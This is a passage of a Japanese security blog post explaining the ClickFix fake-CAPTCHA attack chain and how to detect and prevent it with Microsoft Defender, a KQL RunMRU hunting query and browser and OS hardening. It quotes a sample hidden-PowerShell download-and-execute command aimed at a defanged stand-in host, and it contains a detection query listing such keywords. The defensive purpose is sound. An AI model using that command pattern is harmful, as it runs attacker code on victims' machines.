[{"data":1,"prerenderedAt":1126},["ShallowReactive",2],{"sc:header-data-ja":3,"sc:footer-data-ja":489,"author-ja-nadine-kern-166cee5a31dd89":519,"content-ja-nadine-kern":550,"content-events-ja-nadine-kern":1111,"authors_data:Fritz Zurhorst|Nadine Klein":1112},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"ja":13},{"title":14,"url":15,"alt":16},"ホーム","/ja","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"ja":21},{"title":22,"description":23},"Workplace","Microsoft 365を基盤に、スマートで安全な、柔軟性の高いワークプレイスを実現します。最新のテクノロジーとアイデンティティサービスが一つにつながります。",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"ja":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"ja":34},{"title":35,"url":36},"Managed Intune","/ja/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"ja":40},{"title":41,"url":42},"Managed Entra","/ja/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"ja":46},{"title":47,"url":48},"Managed Workplace","/ja/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"ja":52},{"title":53,"url":54},"Consulting Services","/ja/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"ja":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"ja":64},{"title":65,"url":66},"Microsoft Entra Suite","/ja/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"ja":70},{"title":71,"url":72},"Microsoft Intune","/ja/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"ja":76},{"title":77,"url":78},"Microsoft Windows","/ja/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"ja":82},{"title":83,"url":84},"Windows 365 Cloud PC","/ja/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"ja":88},{"title":89,"url":90},"Cloud Workplace Foundation","/ja/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"ja":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"ja":100},{"title":101,"url":102},"Microsoft 365 Copilot","/ja/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"ja":106},{"title":107,"url":108},"Teams","/ja/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"ja":112},{"title":113,"url":114},"SharePoint & Power Platform","/ja/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"ja":118},{"title":119,"url":120},"Exchange Online","/ja/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"ja":124},{"title":125,"url":126},"Information Protection & Compliance","/ja/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"ja":130},{"title":131,"description":132},"Azure","Azureで成長を後押しします。IaaSとPaaSによって、クラウドのコストを下げ、効率を高め、イノベーションを進めます。",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"ja":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"ja":142},{"title":143,"url":144},"Azure Managed Services","/ja/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"ja":148},{"title":149,"url":150},"Azure Consulting","/ja/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"ja":154},{"title":155},"シナリオ",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"ja":160},{"title":161,"url":162},"クラウドを計画する","/ja/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"ja":166},{"title":167,"url":168},"クラウドへ移行する","/ja/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"ja":172},{"title":173,"url":174},"ビジネスを刷新する","/ja/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"ja":178},{"title":179,"url":180},"VMware戦略を立て直す","/ja/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"ja":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"ja":190},{"title":191,"url":192},"Azure Foundation","/ja/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"ja":196},{"title":197,"url":198},"Azure AI Foundation","/ja/azure/azure-ai-foundation",{"name":86,"languages":200},{"ja":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"ja":205},{"title":206,"url":207},"Azure Data Foundation","/ja/azure/azure-data-foundation",{"name":188,"languages":209},{"ja":210},{"title":211,"url":212},"Azure Container Foundation","/ja/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"ja":216},{"title":217,"url":218},"Managed Dark Tenant","/ja/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"ja":222},{"title":223,"url":224},"Cloud Adoption Framework","/ja/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"ja":228},{"title":229,"url":230},"Cloud Competence Center","/ja/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"ja":234},{"title":235,"description":236,"emergency":237},"Security","受賞歴のある24時間365日のManaged Service、インシデント対応、最新水準の保護で、クラウドの安全を見守り、インフラを守ります。",{"text":238,"href":239,"skin":240,"icon":241},"サイバー攻撃の渦中ですか？","/ja/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"ja":249},{"title":250,"url":251},"Managed Red Tenant","/ja/security/managed-red-tenant",{"name":214,"languages":253},{"ja":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"ja":259},{"title":260,"url":261},"Sentinel Data Lake","/ja/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"ja":265},{"title":266,"url":267},"Security Consulting","/ja/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"ja":274},{"title":275,"url":276},"Cloud Security Operations Center","/ja/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"ja":280},{"title":281,"url":282},"Global Secure Access","/ja/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"ja":286},{"title":287,"url":288},"MyWorkID","/ja/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"ja":295},{"title":296,"url":297},"Preventive Services","/ja/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"ja":301},{"title":302,"url":303},"Data Security Service","/ja/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"ja":307},{"title":308,"url":309},"Security Copilot Agents","/ja/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"ja":313},{"title":314,"url":315},"NIS2を技術で実装する","/ja/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"ja":319},{"title":320,"description":321},"製品","完全に安全で100%クラウドネイティブなMicrosoft環境のためのCompanion製品です。協働、ネットワーク認証、ソフトウェア管理を強化します。",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"ja":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","クラウドベースのソフトウェア配布",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"ja":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","クラウドからの証明書配布",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"ja":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Office 365のデータをローカルで利用",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"ja":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","サーバー間のデータ移行",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"ja":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Microsoft 365向けのTerraform Provider",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"ja":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","ネットワークの認証",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"ja":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Microsoft Teamsで連絡先を探す",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"ja":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Windows Autopilotのリアルタイム監視",{"name":396,"languages":397},"casestudies",{"ja":398},{"title":399,"url":400,"description":401},"導入事例","/ja/casestudies","当社はクラウドの先駆者として、包括的なクラウドソリューションを提供するMicrosoftのトップパートナーです。ブループリントに基づくアプローチとInfrastructure as Codeの知見が土台にあります。",{"name":403,"languages":404,"children":407},"company",{"ja":405},{"title":406,"description":401},"会社",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"ja":411},{"title":412},"会社概要",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"ja":417},{"title":418,"url":419},"Facts & Figures","/ja/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"ja":423},{"title":424,"url":425},"お問い合わせと拠点","/ja/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"ja":429},{"title":430,"url":431},"スイスのglueckkanja","/ja/company/switzerland",{"name":433,"languages":434},"austria",{"ja":435},{"title":436,"url":437},"オーストリアのglueckkanja","/ja/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"ja":441},{"title":442},"キャリア",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"ja":447},{"title":448,"url":449},"採用情報","/ja/career",{"name":451,"languages":452},"company-young-professionals",{"ja":453},{"title":454,"url":455},"Young Professionals","/ja/young-professionals",{"name":457,"languages":458},"company-jobs",{"ja":459},{"title":460,"url":461},"募集職種","/ja/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"ja":465},{"title":466},"最新情報",[468,474],{"name":469,"languages":470},"company-blog",{"ja":471},{"title":472,"url":473},"ブログ","/ja/blog",{"name":469,"languages":475},{"ja":476},{"title":477,"url":478},"イベント","/ja/events",[480],{"name":481,"languages":482},"career-meta",{"ja":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"ja":487},{"title":488,"url":425,"active":484},"お問い合わせ",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksJa":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"プライバシーポリシー","/ja/privacy",{"title":514,"url":515},"運営者情報","/ja/imprint",{"title":517,"url":518},"Cookieなし","/ja/cookies",{"id":520,"title":521,"body":522,"description":528,"extension":533,"meta":534,"name":535,"navigation":325,"otherLanguages":536,"path":546,"seo":547,"stem":548,"__hash__":549},"authors/nadine-kern.md","Nadine Kern",{"type":523,"value":524,"toc":529},"minimal",[525],[526,527,528],"p",{},"Nadine Klein arbeitet als Cloud Architect im Bereich Security. Sie berät Kunden bei der Planung und Umsetzung der Microsoft 365 Defender Produkte. Außerdem betreut sie unsere Kunden im Cloud Security Operations Center und ist Teil unseres APT Repsonse Teams bei kompromittierten oder verschlüsselten Kundenumgebungen.",{"title":530,"searchDepth":531,"depth":531,"links":532},"",2,[],"md",{},"Nadine Klein",{"en":537,"es":538,"sv":539,"fi":540,"da":541,"ko":542,"nl":543,"no":544,"ja":545},"Nadine Klein works as a Cloud Architect in the area of Security. She advises customers on the planning and implementation of Microsoft 365 Defender products. She also supports our customers in the Cloud Security Operations Center and is part of our APT Repsonse team for compromised or encrypted customer environments.","Nadine Klein trabaja como Cloud Architect en el ámbito de Security. Asesora a los clientes en la planificación e implementación de los productos Microsoft 365 Defender. Además, atiende a nuestros clientes en el Cloud Security Operations Center y forma parte de nuestro APT Response Team en entornos de clientes comprometidos o cifrados.","Nadine Klein arbetar som Cloud Architect inom området Security. Hon rådgiver kunder vid planering och genomförande av Microsoft 365 Defender-produkterna. Dessutom betjänar hon våra kunder i Cloud Security Operations Center och ingår i vårt APT Response Team vid komprometterade eller krypterade kundmiljöer.","Nadine Klein työskentelee Cloud Architectina Security-alueella. Hän neuvoo asiakkaita Microsoft 365 Defender -tuotteiden suunnittelussa ja käyttöönotossa. Lisäksi hän palvelee asiakkaitamme Cloud Security Operations Centerissä ja on osa APT Response Team -tiimiämme vaarantuneissa tai salatuissa asiakasympäristöissä.","Nadine Klein arbejder som Cloud Architect inden for området Security. Hun rådgiver kunder om planlægning og implementering af Microsoft 365 Defender-produkterne. Desuden betjener hun vores kunder i Cloud Security Operations Center og er en del af vores APT Response Team ved kompromitterede eller krypterede kundemiljøer.","Nadine Klein은 Security 분야의 Cloud Architect로 일하고 있습니다. 그녀는 Microsoft 365 Defender 제품의 계획 및 구현과 관련하여 고객에게 자문을 제공합니다. 또한 Cloud Security Operations Center에서 고객을 지원하며, 침해되었거나 암호화된 고객 환경에 대응하는 APT Response Team의 일원이기도 합니다.","Nadine Klein werkt als Cloud Architect op het gebied van security. Ze adviseert klanten bij de planning en implementatie van de Microsoft 365 Defender producten. Daarnaast begeleidt ze onze klanten in het Cloud Security Operations Center en is ze onderdeel van ons APT Response Team bij gecompromitteerde of versleutelde klantomgevingen.","Nadine Klein jobber som Cloud Architect innen security. Hun rådgir kunder ved planlegging og implementering av Microsoft 365 Defender-produktene. I tillegg følger hun opp kundene våre i Cloud Security Operations Center og er en del av APT Response-teamet vårt ved kompromitterte eller krypterte kundemiljøer.","Nadine KleinはSecurity領域のCloud Architectです。Microsoft 365 Defender製品の計画と導入についてお客様を支援しています。さらに、Cloud Security Operations Centerで当社のお客様を担当し、侵害されたり暗号化されたりしたお客様環境に対応するAPT Response Teamの一員でもあります。","/nadine-kern",{"title":521,"description":528},"nadine-kern","56qh4Ybfi7H4W9Itn4ADcyI2MJdu50TKarjr_ArknXo",[551],{"id":552,"title":553,"author":554,"body":556,"cta":494,"description":530,"eventid":494,"extension":533,"hideInRecent":484,"layout":1064,"meta":1065,"moment":1069,"navigation":325,"path":1103,"seo":1104,"stem":1105,"tags":1106,"webcast":484,"__hash__":1110},"content_ja/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix。ユーザー自身がエクスプロイトになるとき、そしてそれを止める方法",[555,535],"Fritz Zurhorst",{"type":523,"value":557,"toc":1053},[558,563,566,569,576,584,587,593,596,615,626,632,638,641,645,647,650,653,656,658,661,675,679,681,688,767,784,787,791,793,796,811,814,817,821,823,826,829,854,858,860,863,870,874,876,879,905,908,911,914,1013,1016,1019,1022,1033,1036,1039,1041,1049],[559,560,562],"h2",{"id":561},"clickfixの攻撃チェーン","ClickFixの攻撃チェーン",[526,564,565],{},"{: .h3-font-size}",[526,567,568],{},"ClickFixは、ユーザーが自分自身への攻撃者になる攻撃です。エクスプロイトも脆弱性も使いません。被害者がたった一度のコピー＆ペーストで、悪意あるコードを自分で実行します。",[526,570,571],{},[572,573],"img",{"alt":574,"src":575},"5段階のClickFix攻撃チェーン：おとり、トリック、コピー＆ペースト、実行、感染。","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[526,577,578,579,583],{},"おとりはソーシャルエンジニアリングです。悪意あるサイト上の偽のCAPTCHA、偽のサポート通知（「ブラウザの更新が必要です」）、フィッシングメール、あるいは偽の会議ページなどです。被害者がページを開いている間に、JavaScriptが",[580,581,582],"code",{},"clipboard.writeText()","でペイロードをクリップボードに書き込みます。そのうえでページは、Win+R、Ctrl+V、Enterを押すようユーザーに促します。ファイル名を指定して実行のダイアログは、クリップボードにあるものを起動します。",[526,585,586],{},"典型的なおとりはこのように見えます。",[526,588,589],{},[572,590],{"alt":591,"src":592},"偽のCAPTCHAおとりのスクリーンショット。WinとXを押し、次に貼り付けてEnterでコマンドを実行するようユーザーに促している。","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[526,594,595],{},"クリップボードに置かれるコマンドはこのようなものです。",[597,598,600],"div",{"style":599},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[601,602,606],"pre",{"className":603,"code":604,"language":605,"meta":530,"style":530},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[580,607,608],{"__ignoreMap":530},[609,610,613],"span",{"class":611,"line":612},"line",1,[609,614,604],{},[526,616,617,618,621,622,625],{},"同時に2つのことが起きます。PowerShellが隠しウィンドウで起動し（",[580,619,620],{},"-w h","）、",[580,623,624],{},"iex(irm …)","がペイロードをダウンロードしてメモリ上で直接実行します。ディスクには何も残らないため、シグネチャベースのアンチウイルスにはスキャンする対象がありません。第2段階はたいていインフォスティーラー（Lumma、Vidar、RedLine、StealC）、リモートアクセス型トロイの木馬、あるいはランサムウェアのローダーです。",[526,627,628,629,631],{},"同じパターンをMicrosoft Defenderのテレメトリで見ると、Windows Terminalから起動された隠しPowerShellが",[580,630,624],{},"を実行しています。",[526,633,634],{},[572,635],{"alt":636,"src":637},"WindowsTerminal.exeからpwsh.exe、powershell.exeへと続くプロセスチェーンがiex(irm …)コマンドを実行しているMicrosoft Defenderのinspect record。","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[526,639,640],{},"これがこれほどうまく機能する理由は、すべてがユーザーコンテキストで、昇格された権限なしに実行されるからです。Cookie、保存されたパスワード、セッショントークンは標準ユーザーの手の届く範囲にあります。攻撃者は目的のものを手に入れるために権限を昇格させる必要がありません。",[559,642,644],{"id":643},"microsoft-defenderが検知するもの","Microsoft Defenderが検知するもの",[526,646,565],{},[526,648,649],{},"Microsoftはこの数か月、ClickFixの検知に多くを投じてきました。Defenderが健全で正しく設定されていれば、ClickFixのペイロードに対してネイティブの検知が得られます。2025年第2四半期以降、MDEは「Suspicious 'ClickFix' behavior detected」「Malicious PowerShell command executed via Run dialog」「An active 'Pacalau' malware in a command line was prevented from executing」といったタイトルで、振る舞いベースのアラートを出しています。これらはプロセスチェーンの分析を通じてMDEのクラウドエンジンから発報され、AVの検知と並行して、多くの場合は数秒早く上がります。",[526,651,652],{},"これを可能にする設定については、後述の実行のハードニングで扱います。",[559,654,655],{"id":655},"ネイティブ検知が限界に達するところ",[526,657,565],{},[526,659,660],{},"クラウドベースのMLシグネチャは、発火するまでに時間がかかります。PowerShellの起動からDefenderのアラートまで1分を超える隙間が生じるのを、当社は定常的に観測しています。より速いペイロードはこの時間差をすり抜けます。",[526,662,663,664,666,667,670,671,674],{},"さらに攻撃者の適応も速いです。",[580,665,605],{},"を",[580,668,669],{},"mshta http://...","や",[580,672,673],{},"msiexec /i http://...","に置き換えれば、どちらも定番のLOLBinですが、PowerShellに特化した検知はもう働きません。",[559,676,678],{"id":677},"その隙間を埋めるrunmruハント","その隙間を埋める：RunMRUハント",[526,680,565],{},[526,682,683,684,687],{},"この隙間はカスタム検知で埋めます。出発点は、ユーザーがWin+Rダイアログに入力したコマンドをすべて記録するレジストリキー",[580,685,686],{},"RunMRU","に対するKQLクエリです。",[597,689,690],{"style":599},[601,691,695],{"className":692,"code":693,"language":694,"meta":530,"style":530},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[580,696,697,702,707,713,719,725,731,737,743,749,755,761],{"__ignoreMap":530},[609,698,699],{"class":611,"line":612},[609,700,701],{},"DeviceRegistryEvents\n",[609,703,704],{"class":611,"line":531},[609,705,706],{},"| where ActionType =~ \"RegistryValueSet\"\n",[609,708,710],{"class":611,"line":709},3,[609,711,712],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[609,714,716],{"class":611,"line":715},4,[609,717,718],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[609,720,722],{"class":611,"line":721},5,[609,723,724],{},"| where RegistryValueData has \" ✅ \"\n",[609,726,728],{"class":611,"line":727},6,[609,729,730],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[609,732,734],{"class":611,"line":733},7,[609,735,736],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[609,738,740],{"class":611,"line":739},8,[609,741,742],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[609,744,746],{"class":611,"line":745},9,[609,747,748],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[609,750,752],{"class":611,"line":751},10,[609,753,754],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[609,756,758],{"class":611,"line":757},11,[609,759,760],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[609,762,764],{"class":611,"line":763},12,[609,765,766],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[526,768,769,770,773,774,773,777,773,780,783],{},"このクエリは、ClickFixのコマンドらしく見えるWin+Rのエントリをすべてマークします。PowerShell、mshta、curl、msiexecが、",[580,771,772],{},"-w hidden","、",[580,775,776],{},"iex",[580,778,779],{},"irm",[580,781,782],{},"DownloadString","、Base64エンコードされたペイロードといった典型的な指標と組み合わさっている場合です。微妙な手口も捉えます。多くの偽CAPTCHAのおとりがコマンドの前に置く緑のチェックマーク絵文字。攻撃者がテキストを偽装して単純な文字列フィルタを回避するために使う、キリル文字、アラビア文字、タイ文字などの領域のUnicode文字。これらのパターンのいずれかがWin+Rのエントリに現れたなら、まさにいまClickFix攻撃が進行している可能性が非常に高いです。",[526,785,786],{},"CSOCをご利用のお客様に対しては、当社がこれらをはじめとするカスタム検知を運用し、新しい攻撃手法と標準搭載の検知との間の隙間を埋めています。",[559,788,790],{"id":789},"防御レイヤー1配信をブロックする","防御レイヤー1：配信をブロックする",[526,792,565],{},[526,794,795],{},"ここからは予防の話です。ClickFixは広く使われていて成功率も高いため、単一の防御では足りません。当社は配信から実行まで、レイヤーで対処します。",[526,797,798,799,802,803,806,807,810],{},"Network Protectionは、既知の配信ドメインとC2サーバーをすべてのブラウザに対してブロックします。MDEのWeb Content Filteringが「Newly registered domains」「Hacking」「Illegal Software」といったカテゴリーで補完します。Network ProtectionはWindowsに組み込まれていますが、サードパーティ製ブラウザではQUICとECHを無効化する必要があります。どちらも接続全体を暗号化し、宛先ドメインを隠すためです。ChromeとFirefoxではエンタープライズポリシーでQUICを無効化し（Chromeでは",[580,800,801],{},"QuicAllowed = Disabled","、Firefoxでは",[580,804,805],{},"network.http.http3.enable = false","）、ECHについてはChromeで",[580,808,809],{},"EncryptedClientHelloEnabled = Disabled","を設定します。",[526,812,813],{},"EdgeではSmartScreenを有効化します。サードパーティ製ブラウザでは、それぞれに組み込まれたSafe Browsingを有効にします。これはNetwork Protectionと同じものではありませんが、有害なサイトのフィルタリングには役立ちます。メール経路については、Safe LinksとSafe Attachmentsがユーザーの操作前にリンクと添付ファイルを検査します。",[526,815,816],{},"難点は、これらがすべて既知のインフラにしか効かないことです。現在のClickFixキャンペーンは、識別とブロックが間に合わない新規登録のインフラを使い、ときには攻撃者が侵害した正規サイトを使います。ですから次に、おとりが届いた後で何が守ってくれるのかを見ていきます。",[559,818,820],{"id":819},"防御レイヤー2トリックをブロックする","防御レイヤー2：トリックをブロックする",[526,822,565],{},[526,824,825],{},"ユーザーが悪意あるサイトにいる間にハードルを上げるEdgeの機能がいくつかあります。ブラウザ拡張機能のガバナンスは、ClickFixのオーバーレイを挿入したりクリップボードを操作したりする悪意ある拡張や侵害された拡張を、ユーザーがインストールするのを防ぎます。Edge Enhanced Security Modeは、未知のサイトや訪問頻度の低いサイトにより厳しい保護を適用し（JITの無効化、Control Flow Guard、ハードウェア支援のスタック保護）、エクスプロイトを利用したブラウザ乗っ取りを大幅に難しくします。Typo Protectionはタイポスクワッティングのドメイン（micros0ft.com、paypa1.com）について警告し、偽のブランドドメインを経由する一般的なClickFixの配信経路をブロックします。",[526,827,828],{},"技術的な統制は半分にすぎません。ユーザーへの啓発は依然として決定的です。大部分を支える一つの原則はこうです。ウェブサイトが何かをコンピューターに貼り付けるよう求めてきたら、それは攻撃です。啓発トレーニングではこれを具体的に扱ってください。",[830,831,833,834,833,842,833,848],"ul",{"style":832},"margin: 0.25rem 0","\n  ",[835,836,837,841],"li",{},[838,839,840],"strong",{},"実物のおとりを見せる:"," 偽の「Verify you are human」チェックボックス、「ブラウザの更新が必要です」、「ドキュメントをレンダリングできませんでした。この修正を実行してください」、壊れたTeamsやZoomの音声プロンプトなど。",[835,843,844,847],{},[838,845,846],{},"クリップボードの手口を実演する:"," ページが黙ってクリップボードを書き換える様子を見せる。",[835,849,850,853],{},[838,851,852],{},"報告を簡単にする:"," 素早く、責めずに。",[559,855,857],{"id":856},"防御レイヤー3操作をブロックする","防御レイヤー3：操作をブロックする",[526,859,565],{},[526,861,862],{},"ここにはシステムをハードニングする方法がいくつかありますが、どれも保証にはなりません。まずはファイル名を指定して実行のダイアログを無効化するところから始めます。これでWin+Rという入口が消えます。MicrosoftのClickFixガイダンスも、「where it isn't necessary」無効化することを推奨しています。これは特定のWin+Rペースト攻撃を封じますが、エクスプローラーのアドレスバーやWindows Terminalといった代替の起動口は残ります。",[526,864,865,866,869],{},"Edgeはさらに",[580,867,868],{},"DefaultClipboardSetting","でハードニングできます。これによりJavaScriptが黙ってクリップボードに書き込むのを防げます。",[559,871,873],{"id":872},"防御レイヤー4実行をブロックする","防御レイヤー4：実行をブロックする",[526,875,565],{},[526,877,878],{},"高度な機能に進む前に、基本を整えてください。ClickFixについてはこうなります。",[830,880,833,881,833,887,833,893,833,899],{"style":832},[835,882,883,886],{},[838,884,885],{},"ローカル管理者権限の削減:"," 